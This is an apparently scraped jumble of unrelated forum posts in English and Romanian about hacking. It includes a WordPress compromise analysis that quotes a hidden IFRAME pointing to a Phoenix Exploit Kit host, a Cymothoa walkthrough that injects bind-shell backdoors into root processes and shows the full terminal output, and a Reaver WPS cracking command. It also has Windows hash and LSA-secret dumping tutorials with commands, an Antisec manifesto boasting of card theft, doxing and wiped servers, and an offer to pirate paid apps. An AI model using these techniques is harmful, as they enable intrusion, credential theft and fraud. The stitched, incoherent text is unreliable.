co4ie

Hacker's Demo Shows How Easily Credit Cards Can Be Read Through Clothes And Wallets Pull out your credit card and flip it over. If the back is marked with the words “PayPass,” “Blink,” that triangle of nested arcs that serves as the universal symbol for wireless data or a few other obscure icons, Kristin Paget says it’s vulnerable to an uber-stealthy form of pickpocketing. As she showed on a Washington D.C. stage Saturday, she can read all the data she needs to make a fraudulent transaction off that card with just a few hundred dollars worth of equipment, and do it invisibly through your wallet, purse, or pocket. At the Shmoocon hacker conference, Paget aimed to indisputably prove what hackers have long known and the payment card industry has repeatedly downplayed and denied: That RFID-enabled credit card data can be easily, cheaply, and undetectably stolen and used for fraudulent transactions. With a Vivotech RFID credit card reader she bought on eBay for $50, Paget wirelessly read a volunteer’s credit card onstage and obtained the card’s number and expiration date, along with the one-time CVV number used by contactless cards to authenticate payments. A second later, she used a $300 card-magnetizing tool to encode that data onto a blank card. And then, with a Square attachment for the iPhone that allows anyone to swipe a card and receive payments, she paid herself $15 of the volunteer’s money with the counterfeit card she’d just created. (She also handed the volunteer a twenty dollar bill, essentially selling the bill on stage for $15 to avoid any charges of illegal fraud.) Paget magnetizing a counterfeit card with a volunteer's wirelessly-stolen credit card data on stage at Shmoocon. If anyone still doubted that the trick had worked, Paget accidentally flashed the volunteer’s credit card number on a screen in front of an audience of hundreds of hackers and security researchers. “You were planning on cancelling that card, weren’t you?” she added somewhat sheepishly. Contactless cards are far more common than they might seem: According to the Smart Card Association, about 100 million of the RFID-enabled cards are in circulation. Visa calls its technology payWave, MasterCard dubs it PayPass, Discover brands it Zip, and American Express calls it ExpressPay. According to a show of hands among Shmoocon’s audience, dozens of the several hundred conference attendees in the room had contactless cards, and about a quarter of those weren’t aware of it until Paget asked them pull out their cards and check for contactless symbols. Paget, a well-known security researcher for the consultancy Recursion Ventures who was known as Christopher Paget until a gender change last May, used a simple method for his hack: impersonating a legitimate contactless point-of-sale terminal with her own RFID card reader. (That’s the striped panel pictured above.) In one practical version of the scam, Paget says, a fraudster could simply bump up against his victim with that reader in a coat pocket and invisibly scan the RFID signal through material like a leather wallet or cloth pants. In a demonstration just before her talk, Paget read a card in my wallet through my back pocket without touching me, successfully obtaining the card’s information. The scheme, Paget points out, doesn’t involve any hidden bug in the system, but rather the more fundamental problem that any commercially-available RFID reader can read the data from a contactless card as easily as a store’s point-of-sale device does. “Whatever encryption or other security there might be, it doesn’t matter,” she says. “The reader just spits out the number as if I’m the point-of-sales terminal, which is totally stupid. This is an embarrassingly simple hack, but it works.” The attack Paget demonstrated is far from new. The security industry has known since 2006 that contactless credit cards can be read wirelessly without the owner’s knowledge. But in current versions of the cards, the user’s name, PIN and the three-digit CVV on the back of the card aren’t included in the wirelessly-read information, which the industry has argued means the attack isn’t practical. Randy Vanderhoof, executive director of the industry group the Smart Card Alliance, points out that despite previous research on the contactless attack, no real-world instances of the fraud have ever been reported. “We’ve got six years of history, a hundred million users of these cards, and we haven’t seen any documented cases of this kind of fraudulent transaction. The reason we think that’s the case is that it’s very difficult to monetize this as a criminal,” says Vanderhoof. “The premise that this is a new threat is absolutely false and isn’t supported by [Paget's] demonstration.” In fact, contactless cards do offer one security feature traditional cards don’t: Along with the card’s 16-digit number and expiration date, the cards are set to offer up a one-time CVV code with every scan. Those codes can only be used for one transaction, and have to used in the order they’re generated. If a payment processor that detects multiple transactions with the same code or codes being used to make transactions in the wrong order, it will disable the card. So a contactless card scammer can only use each stolen number for one transaction, and if the victim of a the scam uses the card again before the thief has time to make a fraudulent payment, all transactions on the card will be blocked. But Paget says that rotating one-time CVV only means a fraudster would need to target multiple victims rather than defraud a single victim repeatedly. The scammer could stand in a crowded train station, for instance, reading the card numbers of many passers-by and sending them to an accomplice who carried out the rest of the scheme in real-time. “Instead of one person seeing many fraudulent transactions on their card, fifty people see one transaction on their statement, and maybe they don’t even notice it,” she says. ”The card industry says this isn’t possible, but the information they’re giving you isn’t complete. I needed me to get up on stage and prove it so they would accept that the problems are real.” And now how to solve those problems? Perhaps the simplest solution, Paget advises, is to kill your card’s RFID chip by frying it in the microwave. But that’s a more delicate task than it might seem. “Three seconds in the microwave will kill the chip,” she says. “Five seconds will set it on fire.” Paget's Guardbunny, a credit-card-sized RFID jamming device (Click to enlarge.) Paget’s firm has been working on a more sophisticated fix: a credit-card-shaped protection device known as GuardBunny that sits in a wallet alongside payment cards and blocks any would-be RFID fraudster. Paget says the device, which remains a prototype and still has no roadmap for commercial sale, blocks RFID signals far more effectively than any currently-available RFID-shielding wallet. Commercially-available RFID blockers simply shield cards or passports with a layer of aluminum or steel. Guardbunny, by contrast, reflects back the reader’s RFID signal with its own chip, effectively jamming the radio signal. That technique means even high-powered RFID readers would likely fail to pick up any credit card signals nearby. “It doesn’t matter how much power you put into it, it just bounces it back at you,” Paget says. Better still, when Guardbunny detects an RFID reader’s signal, it emits a high-pitched whining sound and its bunny icon’s eyes glow (as pictured) to warn of possible contactless pickpockets. Paget admits that certain high-level attacks could get around even the Guardbunny’s protections. “You can defeat this. But it involves building your own reader,” she says. “That’s a lot more to demand of the bad guys than spending $50 on eBay.”

A few days ago, hundreds of websites, based on WordPress 3.2.1, were compromised. The attacker uploaded an HTML page to the standard Uploads folder and that page redirects the user to the Phoenix Exploit Kit. Its logs show that users from at least four hundred compromised sites were redirected to Phoenix exploit pages. Here is a partial list of those websites: Partial list of compromised WordPress websites The content uploaded by the attacker is not part of the home page and will not show when users browse these websites. In fact, accessing any page on these compromised WordPress sites, other than the uploaded page, will not infect the user’s machine. The general motivation of attackers to compromise websites is mainly to bypass URL reputation mechanisms, spam filters and certain security policies. In order to lure users to these pages, the attacker sent thousands of malicious emails querying an unfamiliar bill and asking recipients to click on a link as described by Websense blog. The link points to the aforementioned uploaded page. The malicious uploaded page The page is obfuscated and adds a hidden IFRAME that leads to the Phoenix Exploit Kit: <IFRAME style=”RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px” src=”hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php” frameborder=”0?></IFRAME> The exploit page is hosted in a Russian domain called horoshovsebudet which roughly translates as “Everything will be fine”, showing a certain sense of humor by these attackers. The Phoenix Exploit Kit identifies the User Agent of the client machine and delivers a customized exploit Web page. The following obfuscated page was served when accessing with Internet Explorer 6: The obfuscated Phoenix exploit page The obfuscated page above generates code which attempts exploiting multiple vulnerabilities in Microsoft Internet Explorer, Adobe PDF, Flash and Oracle Java as described in the Phoenix Exploit Kit blog. Among those exploits is the latest Java Rhino vulnerability as shown in the following screenshot and taken from the original malicious server. Statistics on Phoenix Exploit Kit control panel Note the successful exploitation rate of the Java Rhino vulnerability and of the PDF Libtiff vulnerability. Even the MDAC vulnerability is successfully exploited which is surprising given that it only exists in the old version 6 of Internet Explorer. Interestingly enough, the “Browser statistics” chart in the screen shot above shows that none of the victims used Google Chrome. Taking a closer look at the source code of the Phoenix Exploit Kit reveals that Chrome browser is explicitly excluded, for no obvious reason: Phoenix Exploit Kit source code All M86 Secure Web Gateway customers are protected against this attack by default. The access to the exploit page is blocked. As usual, stay safe and be careful not to click links in suspicious emails. Sursa

@ cifratorul : De asta suntem noi aici ... acum stim cine face cinste cu primul rand la urmatoare intalnire:)) @ Begood: Felicitari ! Esti un exemplu perfect ca : Daca inveti si muncesti rasplata nu intarzie sa apara !!

Ok ... merci mult si astept reply-ul tau ! (by the way ... da edit la post daca ai uitat sa scrii ceva... nu mai fa dublu-post) Iti multumesc ca ai clarificat treaba cu omni/directionala !! M-am decis pe omnidirectionala pt ca antena va veni undeva in afara geamului .. perpendiculara cu solul iar la 20/25m peste strada e un bloc de 10 etaje (deci directionala cam iese din discutie , distanta fiind prea mica pt a capta in unghi mare mai ales cu un relector mic) ! As vrea sa fac ceva de genu ... sau alt model... sa vad ce mai gasesc ... problema principala era cu placa wifi pe care o am .. sa vad cum lipesc firele !! Apropo ... am o antena de la statia auto ... cum nu o sa folosesc internetul in timp ce conduc (eu vreau antena numai pt acasa si sa fie cat mai "estetica") nu ar merge folosita asta ca antena lipita pe aerul conditionat ca reflector ? si daca da ..oare gasesc un adaptor de la mufa antenei la mufa uFL ?

@ bruttus139 : Ok ... Dupa cu ti-am zis nu prea le am la electronica ... imi poti desena ca la prosti (ca practic in domeniul asta sunt unul)? ce si unde trebuie sa dezlipesc/lipesc/tai ... Faza mai urata e ca, condensatorii nu trec prin placa... dupa cum se vede si pe langa faptul ca sunt extrem de mici ... cred ca ar fi imposibil sa lipesc ceva langa ei !! Eu practic as vrea o antena omnidirectionala ... imi poti sugera un model mai simplu si mai fiabil? Eu stau in Bucuresti si nu duc lipsa de Retele in zona... dar chiar as vrea sa fac asa ceva Ma gandeam la un model de genul : dar nu as vrea sa las adaptorul afara la -20* C

Voi sunteti prosti? Ce pula mea aveti voi cu omu`? asta e clasa politica...atat stiu sa faca si asta e mostenire de la ceasca si ai lui ... credeti ca daca erau altii nu la fel faceau? daca nu taiau salariile mareau taxele la 40% si tot acelasi cacat era !! Toti fura... toti sunt niste nenorociti ... si voi in loc sa alegeti raul mai mic va cacati pe voi ... ca doar toti va pricepeti la politica si fotbal !! Luati in pula mea si invatati mocosilor ... munciti cinstit si va asigur ca nimeni si nimic nu va lua ce este al vostru fie el basescu sau iliescu sau alt prost din curtea scolii !! By the way ... Daca tot lauda "Hackerii" romani ... de ce pula mea a permis semnarea ACTA?Nici macar nu a supus dezbaterii publice ...

Am si eu o intrebare... luand in considerare ca nu ma pricep ~deloc la electronica : Am un adaptor usb TP-Link TL-WN312G v4.1 ... care arata asa : Unde as putea sa lipesc firele care vin de la antena? Chiar o sa fie un proiect foarte frumos pt weekend-ul urmator si as vrea sa folosesc adaptorul acesta pt ca sta degeaba prin casa si e cat de cat fiabil !!

Instaleaza un custom rom , Fa Root la el , instaleaza JIT , instaleaza setCPU si fai overclock, sterge aplicatiile de care nu ai nevoie , schimba home-launcher cu LauncherPro , instaleaza data2sd ... si cam atat as putea sa-ti recomand momentan ... cauta Aici mai multe idei ..

Inject Backdoor’s Shellcode Into An Existing Process Cymothoa is a stealth backdooring tool, that injects backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them. root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -S 0 - bind /bin/sh to the provided port (requires -y) 1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org> 2 - bind /bin/sh to tcp port with password authentication (requires -y -o) 3 - /bin/sh connect back (requires -x, -y) 4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org) 5 - script execution (requires -i -c), creates a tmp file in the process dir you must remove 6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/ 7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com 8 - forkbomb (just for fun...) - Kris Katterjohn 9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org 10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com) root@Dis9Team:/pentest/backdoors/cymothoa# root@Dis9Team:/pentest/backdoors/cymothoa# ps aux | grep /bin/bash root 1236 0.0 0.2 4280 1376 tty1 S+ 09:22 0:00 /bin/bash /usr/bin/startx root 1506 0.1 0.3 4648 1932 pts/1 S 09:22 0:00 /bin/bash root 1554 0.0 0.1 3376 744 pts/1 S+ 09:26 0:00 grep --color=auto /bin/bash root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -p 1506 -s 0 -y 10086 [+] attaching to process 1506 register info: ----------------------------------------------------------- eax value: 0xfffffe00 ebx value: 0xffffffff esp value: 0xbf940ae4 eip value: 0xb7818422 ------------------------------------------------------------ [+] new esp: 0xbf940ae0 [+] injecting code into 0xb7819000 [+] copy general purpose registers [+] detaching from 1506 [+] infected!!! root@Dis9Team:/pentest/backdoors/cymothoa# root@Dis9Team:/pentest/backdoors/cymothoa# nmap -p 10086 127.0.0.1 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-23 09:29 CST Nmap scan report for localhost (127.0.0.1) Host is up (0.00062s latency). PORT STATE SERVICE 10086/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds root@Dis9Team:/pentest/backdoors/cymothoa# nc 127.0.0.1 10086 id uid=0(root) gid=0(root) groups=0(root) pwd /pentest/backdoors/cymothoa root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -p 1 -s 2 -y 1002 -o 123456 [+] attaching to process 1 register info: ----------------------------------------------------------- eax value: 0xfffffdfe ebx value: 0xa esp value: 0xbfc0240c eip value: 0xb7856422 ------------------------------------------------------------ [+] new esp: 0xbfc02408 [+] injecting code into 0xb7857000 [+] copy general purpose registers [+] detaching from 1 [+] infected!!! root@Dis9Team:/pentest/backdoors/cymothoa# nc 127.0.0.1 1002 Password: 123456 Un Tool foarte util ... simplu si la obiect !! Sursa

Super tare tutorialul !!Complet si explicat pt toata lumea ! Off: Nytro ... 90% din posturile facute de tine (news si tutoriale) le faci cu 1 min intaintea mea:| ...

Welcome comrades around the world and thanks for joining us for our end of the year crime spree. 2011 is over and what a chaotic year it's been: brutal tyrants and inept dictators were overthrown while multinational corporations and lazy security contractors were systematically targeted for embarrassment and elimination. Was it the year of protests, occupations, revolutions? The year of the hacktivist? Looking back, we’re not quite sure what the hell it was, but we certainly had lots of laughs contributing to the mayhem by owning pretty much anything and everything we wanted to. Did you enjoy looting and plundering the pocketbooks of the rich and powerful during Lulzxmas? Did you enjoy using and abusing the personal emails and passwords of feds and corporate executives? How about all those "Law Enforcement Sensitive" documents stolen from NY police chief emails? And that epic cslea.com defacement on New Years Eve? Yes, many lulz were had during this past week, and rest easy fellow pirates, that was only a taste of the chaos to come. We're ringing in the new year with another exciting #antisec zine release, and this is a big one. Lots of servers were rooted and rm'd. More than a few clueless sysadmins had their .bash_history and mail spools spilled. A lot of cops got doxed — shit, with all the live passwords being dropped here one could easily own police departments in nearly every U.S. state. To match this truly epic hacking spree, we also had to go on an epic shopping spree. In an act of loving egalitarian criminality, we used company credit cards to make donations to dozens of charities and revolutionary organizations, including the Bradley Manning Support Organization, the EFF, the ACLU, CARE, American Red Cross, Amnesty International, Greenpeace, some commies, some prisoners, various occupations, and many more unnamed homies. It took weeks of hard work, but it paid off: to the tune of over $500,000 dollars liberated in total. Some examples we publicized were eventually returned: other payments made more discretely were confirmed to have been received and changed to hard cash. Of course, we had to engage in some pranks as well. What’s life without a little laughter at the expense of the 1%? We sent Pop-Tarts to the sysadmins with the hopes they would appreciate the humor. We also transferred to ourselves some form of anonymous currency that can't be traced or returned. Maybe we even sold or traded some of these cc dumps and password lists with other black hat comrades for botnets and 0days. Fuck em' if they can't take a joke! While we attacked the institutions of capitalism, it would only make sense to attack those who enforce it, the inherently oppressive protectors of property and purveyors of social control; the pigs, the fuzz... the police. Do you remember a month ago when the mayors of over eighteen major cities in the U.S. collaborated with the swine to launch a coordinated attack on Occupation sites? The indiscriminate, and unprovoked, arrest and brutalization of thousands of protesters? We the 99% face an endless cycle of evictions and layoffs, while the powerful elite laugh all the way to the bank, comforted by their lucrative federal contracts and billion dollar bailouts. All our lives we have been robbed blind, and now it's time to start pointing our guns in the right direction. In retaliation for this unprovoked, premeditated police-state brutality, we executed our own raid against New York and California police targets. And no, we will not be using pepper spray or tasers: we'll leave that for the boys in blue. Did you think we forgot? Did you think we would let you kick us out of our parks, teargas us, send veterans to the hospital, and conspire with other police forces to repress our uprising? We do not forgive, we do not forget: our vengeance will swallow you whole, and we will shit you out in to a place more hellish than the prisons you fill. On New Years Eve, our while revolutionary comrades brought the noise to the front of jails across the world in support of the incarcerated, we were opening fire on the websites and emails of the 1%, publishing stolen information from police departments in both California and New York. From coast to coast we lulzed as we hit the top police chiefs: skimming their private email and Facebook accounts, blissfully abusing their internal law enforcement portals, and making off quick with their private documents which we then published on tor hidden services and BitTorrent. Finally, we defaced their websites and rm'd their servers, live on IRC and Twitter for the whole world to see. While we attacked police targets, we also decided to go after their supply chain. We bring you the full story of how we gutted the military and law enforcement equipment supply store, SpecialForces.com. Truth be told, we had been keeping quiet about this particular target for a time while we lived large off its pillaged goods. However, just prior to this release, a former member leaked the cleartext password lists, and some media picked up on it. Now that the jig is up, the full story of this owning can be told. To top this target off, we threw in some credit cards and home address info to thousands of their mostly military and police customer base. Hope they don't mind. Just kidding. We're calling upon all allied battle ships, all armies of darkness, to rise up and use and abuse all the personal information of these tyrannical agents and supporters of the 1%. You wanted lulz? With the sheer amount of passwords, credit cards, and mail spools we plastered all over the internet, you can guarantee that the richest and most powerful people will continue to get owned hard well into 2012. ################################################################### Totul gasiti AICI

Mda... POC-ul va trebui sa mai astepte ... nu mai am pe ce sa fac teste si pe routerele vecinilor ori nu au wps ori reaver nu se poate autentifica cu AP-ul ... ramane sa mai testez sau daca vreti puteti testa voi !!

@demon_zone: Vezi ca pe 2 Feb este concert Dilated Peoples in Silver Church ....

Si tool-ul a fost lansat Details

The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours. Reaver is a WPA attack tool developed by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community. Usage is simple just specify the target BSSID and the monitor mode interface to use: # reaver -i mon0 -b 00:01:02:03:04:05 Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point's PIN and then extract the PSK and give it to the attacker. Get open source version of Reaver at Google Code Sursa Voi face un video cu POC al acestei metode ... sper sa fie ceea ce asteptam toti !!

The Antisec wing of Anonymous revealed on Saturday that had compromised the servers of the private intelligence firm Strategic Forecasting Inc. — allegedly seizing millions of internal documents and thousands of credit card numbers from the company, more commonly known as Stratfor. That would be a major breach of private information from any firm. But this hack could prove particularly significant, because Stratfor serves as an information-gathering resource and open source intelligence analysis for both the U.S. military and for major corporations. Antisec breached Stratfor’s networks several weeks ago, according to sources within the group that attacked the firm. On Saturday, Antisec began posting credit card details of a few Stratfor customers on Internet Relay Chats. But that’s just the start of a much larger data dump, the group claims. Anonymous is planning to release much more information — up to 200 gigabytes worth, in parts throughout the week leading up to New Year’s Eve. That trove allegedly includes 860,000 usernames, emails, and md5-hashed passwords; data from 75,000 credit cards, including security codes used for no card present transactions; and over 2.5 million Stratfor emails, internal Stratfor documents from the company’s intranet, and support tickets from it.stratfor.com. “Four servers were rooted and wiped,” said one participant in the attack, “Charred like ashes, just like what we plan on doing with their old crumbling world.” Stratfor’s website is currently down. But on its Facebook page, the company admitted that “an unauthorized party disclosed personally identifiable information and related credit card data of some of our members. We have reason to believe that your personal and credit card data could have been included in the information that was illegally obtained and disclosed.” “We have also retained the services of a leading identity theft protection and monitoring service on behalf of the Stratfor members that have been impacted by these events,” the firm added. According to Antisec, Stratfor was using the e-commerce suite Ubercart to handle customer information. The software has built-in encryption, but Stratfor apparently used custom modules that stored customer data in cleartext. Additionally Stratfor appears to have stored the card security code of its customers, a practice generally prohibited by credit card companies. The first information to be released was a client list culled from Stratfor’s report subscribers, showing self reported employment data. Next was over 30,000 credit cards, accompanied by the announcement that they’d been used to ‘expropriate’ money from banks for charities via small dollar donations. Anonymous participants estimated they had donated between $500,000 and $1,000,000 to charities fraudulently. They released screenshots of some of the charges, including to the Red Cross, Care, which fights poverty around the world, and the EFF. While there’s no sign the cards have been used for personal gain, the op’s participants were unconcerned for the possibility that the charities themselves could be harmed. Said one: “I understood that that was could be a procedural consequence, but the credit card corporations have a choice, to either bite it themselves (poor them, with all their billion dollar bailouts), punish the client, or worst of all, punish the charities that have had nothing to do with this.” There’s real possibility of damage to smaller organizations if the Anonymous donation result in massive chargebacks for fraud. For instance, the Appropriate Infrastructure Development Group (AIDG) which works on access to electricity, sanitation, and clean water tweeted earlier today: “Stratfor Global has us worried. Pls don’t donate to AIDG with stolen credit cards, we get hit $35 per fraudulent transaction! #anonymous RT” According to Antisec participants, Stratfor was targeted because of its client list, which include major companies and government entities, but also because it was terribly insecure. This may presage the future victims, as the group drifts away from picking targets for their humor value and easy hackability, and towards picking targets in line with their political goals. “We believe police and employees who work for the most significant fortune 500 companies are the most responsible for perpetuating the machinery of capitalism and the state,” said one Antisec participant, “That there will be repercussions for when you choose to betray the people and side with the rich ruling classes.” Antisec says that future Lulxmas targets will include law enforcement groups and the companies that supply them. Sursa

Dump Windows password hashes efficiently - Part 3 In the previous two posts of this series, I discussed how to dump Windows local users' password hashes (SAM) and Windows domain users' password hashes from domain controllers (ntds.dit). When the password policy setting is configured to enforce password history, Windows stores a certain number of used passwords before an old password can be reused. The following screenshot shows you where this policy can be set. Local Security Policy (secpol.msc) / Account Policies / Password Policy / Enforce password history By default on workstations, this value is set to 0 and on domain controllers it is set to 24. This means that when dumping domain users' hashes from active directory's ntds.dit file, there are high chances to dump also the password history allowing you, during the password cracking phase, to recognise patterns used by the target users. Despite not being current password hashes, pattern identification can lead to further attacks. For instance, ease of guessing passwords used against standalone services at later stages of your post-exploitation. Therefore, never underestimate the added value provided by dumping and cracking the password history. Many of the tools introduced so far can dump the password history: Cain & Abel, PWDumpX along others. pwhist from Toolcrypt is also a valid option. LSA secrets LSA secrets is an area in the registry where Windows stores important information. This includes: Account passwords for services that are set to run by operating system users as opposed to Local System, Network Service and Local Service. Password used to logon to Windows if auto-logon is enabled or, generally, the password of the user logged to the console (DefaultPassword entry). LSA secrets are stored in registry hive HKEY_LOCAL_MACHINE/Security/Policy/Secrets. Each secret has its own key. The parent key, HKEY_LOCAL_MACHINE/Security/Policy, contains the data necessary for accessing and decoding the secrets. Dump LSA secrets As per SAM hashes, the LSA secrets can be accessed by DLL injection into the lsass.exe process or from the registry files. If you are Administrator and the target system is used in production, I recommend you to choose the safe path and copy off the system the registry files: SYSTEM and SECURITY: you can use the legacy registry hive copy (reg.exe/regedit.exe) or the volume shadow copies technique illustrated in the first post. Cain & Abel can extract LSA secrets from these files. Alternatively, there are numerous tools that can be used to dump LSA secrets by injecting into lsass.exe process: gsecdump has proved to be the most reliable for LSA secrets, working across all Windows versions and architectures. On 32-bit architecture, the original lsadump2 has proved to be good too. Despite my expectations, the two NirSoft tools (LSASecretsDump and LSASecretsView) have failed to dump services' account passwords, regardless of the architecture. Regardless of the technique used, the passwords extracted are UTF-16 encoded. This means that they are in clear-text as opposed to SAM hashes. You can read a detailed description of the LSA secrets format here by moyix. Follows the output of gsecdump on a server running IBM DB2 and PostgreSQL. Both database management systems run as Windows local users: C:\tools>gsecdump.exe -l aspnet_WP_PASSWORD [...] _SC_DB2 [B] 74 00 65 00 73 00 74 00 70 00 61 00 73 00 73 00 t.e.s.t.p.a.s.s. testpass [/B] [...] _SC_postgresql-9.0 [B] 74 00 65 00 73 00 74 00 70 00 61 00 73 00 73 00 t.e.s.t.p.a.s.s. testpass[/B] [...] Threats posed by LSA secrets Now, imagine that you have compromised a server part of a Windows domain, you have got a shell as Local System. If you want to extend your control over the network perimeter, one of the viable ways is to verify if any service runs as real operating system users and, if so, extract their clear-text password from LSA secrets. You can run services.msc from Start / Run and sort the entries by Log On As column to check this quickly. Obviously, the built-in sc.exe command can do the same as well as other less known tools. It is common to identify enterprise software like Veritas Netbackup, Microsoft SQL Server, Microsoft Exchange and others running as real users. More dangerously, sometimes system administrators opt to run services as domain users, if not domain administrators. This is clearly wrong and poses a high threat to overall security of the target Windows domain because, as an attacker, you can dump the LSA secrets and use the clear-text domain administrator password to login to the root domain controller and takeover the Windows network. I have added these tools and improved the spread-sheet recently. Sursa

@Play4Fun01: ai dreptate la capitolul SO ... de aici i se trage "viteza" IOS-ului ! Dar la partea cu rootatul si fix-urile nu inteleg de ce te deranjeaza ... si la IOS trebuie sa ii faci jailbreak ca sa te poti bucurea de el cat de cat ! @dota ... Pt android iti dau eu o aplicatie cu care downloadezi orice aplicatie platita din market moka !! Mai ieftin de atat nu cred ca se poate !

ok...chiar daca nu am fost prezent dar sunt foarte curios de challenge!!

Bine ai venit ... E bine sa stiu ca mai sunt si nemteni printre noi !!

Pm te rog ... chiar ar fi foarte interesant challenge-ul ...

Visa looks into Eastern European security breach Visa is investigating a potential security breach that may have compromised payment cards of Eastern Europeans. Although Visa hasn't disclosed which countries were hit, the Romanian state-owned CEC Bank has blocked and reissued 17,000 cards on suspicion that they had been compromised. CEC Bank said in a statement that "a number" of cards issued by banks both in Romania and abroad might have been compromised via an international database. Here's an excerpt from the statement, translated into English from Romanian by v3.co.uk: Visa pinned the problem on a European payment processor and issued this statement: In his report on this incident, v3's Phil Muncaster pointed to a warning earlier this month from Trend Micro regarding a basic design flaw in some implementations of the 3D Secure protocol - aka "Verified by Visa" and "MasterCard SecureCode" - that could allow crooks to conduct ID fraud on some Visa cards. The potential security hole in 3DS is a result in a weakness in the password reset process of some system versions, Trend Micro's Rik Ferguson explained the flaw on his CounterMeasures blog: He then goes on to describe the password reset link, finding that three of four pieces of information used to verify identity - cardholder name, expiration date and signature panel code - are all contained in the card itself, either embossed or printed and contained in the magnetic stripe data. The fourth piece of information, cardholder date of birth, would be drop-dead easy to track down, he says: The Eastern Europe breach and the 3DS flaw are spelling one headache-y month for Visa so far. Yikes, now all the company needs is for the EU to contemplate carving away at its profits with big fines for privacy breaches or something like that. But wait, that's exactly what the EU is mulling! The way the Financial Times reads it, the proposed rule, slated to be introduced in January, will impact social media most sharply, serving as a significant tool to boost the EU's powers when it comes to combating data protection breaches. But it will be interesting to see what happens (if in fact the rule doesn't get watered down to pointlessness, that is) in cases such as credit card payment breaches like the one Visa is now investigating, if it turns out that Visa or its payment processor was treating customer data with anything less than kid gloves. Sursa

Conclusions on Windows Security Account Manager In the previous post of this series, I briefly explained what the Windows Security Account Manager (SAM) is, how to dump Windows local users' password hashes from SAM having physical access to the target system or following a remote compromise of the machine, post-exploitation. Remotely, there exist three possible techniques: legacy, volume shadow copies and in-memory dump. Lastly, I highlighted the most widely used tools for the in-memory hashes dump and I collected and released them in this spread-sheet along with other tools that I will discuss later. I want to reiterate the following concept: given file transfer ability between your machine and the target system, always prefer to copy the SAM and SECURITY files over from the target and extract the password hashes offline afterwards. Although, this safe approach to password hashes dump does not guarantee that you are going to obtain all Windows local accounts' hashes. If you suspect that this is case, you will have to dump the hashes via in-memory dump and merge the results. Odd, but I have seen this happening quite a few times already and I am still discussing standalone Windows workstations, not part of a Windows domain. Preferred tools Personally, my first choice for standalone SAM hashes dump is pwdump7: it works on all Windows version from 2000 on both 32-bit and 64-bit systems. However, this tool does not perform a real in-memory dump and could miss out hashes. I always run two or three tools to avoid this from happening: fgdump, gsecdump and PWDumpX along with pwdump7 cover both techniques across all Windows versions and architecture and carefully launched once at a time should not crash the LSASS process. When I have got a Metasploit Meterpreter shell onto the system, I rely on the post-exploitation module smart_hashdump by Carlos Perez, falling back to its predecessor post-exploitation module hashdump when it fails. Active Directory Definition from Wikipedia: This definition comes into play when you have compromised a system part of a Windows domain. In order to quickly extend your control over the whole domain, the goal is to compromise the root domain controller. If you are within a child domain, the final goal is to achieve Enterprise Domain Administrator level access onto the root domain controller of the Windows forest's parent domain. There are plenty of resources on the Internet discussing domain escalation and this is out of the scope of this post series. A blog post that summarizes the best techniques and goes straight to the point is written by pentestmonkey.net. Alternatively, you can pass the local users' hashes obtained from your entry point machines to keimpx and spray them against the domain controllers: if the system administrator reuses the same local Administrator password across all machines, you are in! Regardless of how you have compromised a domain controller, preferably the root domain controller as it is the first to get updated with changes to user accounts, the important is that you have got an administrator (local or domain) shell onto it. Database file NTDS.DIT The goal now is to dump the domain users' password hashes. These are stored, along with nearly all the information that is accessible in the Active Directory (user objects, groups, membership information, etc), in a binary file, %SystemRoot%\ntds\NTDS.DIT. This file is locked by the system. You can use the volume shadow copies technique illustrated in the previous post to copy it along with the SYSTEM file over to your machine. Alternatively, use the ntdsutil snapshot facility introduced in Windows Server 2008. It will create a snapshot of the active directory database allowing you to copy ntds.dit and SYSTEM file. This technique is detailed on a Microsoft TechNet article. Extract hashes from NTDS.DIT You can use the passcape's Windows Password Recovery tool to extract hashes from ntds.dit. Alternatively, you can use a couple of tools (ntds_dump_hash.zip) developed by Csaba Barta and documented in his paper titled Research paper about offline hash dump and forensic analysis of ntds.dit. These tools are used to: Extract the required data from ntds.dit: esedbdumphash. Decrypt the hashes and interpreting other information regarding the user account: dsdump.py, dsdumphistory.py, dsuserinfo.py. Download and compile the tool: wget http://csababarta.com/downloads/ntds_dump_hash.zip unzip ntds_dump_hash.zip cd libesedb ./configure && make Use esedbdumphash to extract the datatable from ntds.dit: cd esedbtools ./esedbdumphash -v -t /tmp/output $ ls -1 /tmp/output.export/ datatable Use dsdump.py to dump the hashes from the datatable file using the bootkey (SYSKEY) from the SYSTEM hive: cd ../../creddump/ chmod +x *.py ./dsuserinfo.py /tmp/output.export/datatable ./dsdump.py /tmp/output.export/datatable --include-locked --include-disabled > domain_hashes.txt Like standalone machines, you can use the in-memory technique too to dump the domain users' hashes. The tools are the same and work equally. Just be cautious when injecting into the LSASS process of a domain controller: in the worst case scenario, you will have to reboot an infrastructure-critical server. I have added these tools and improved the spread-sheet. Sursa

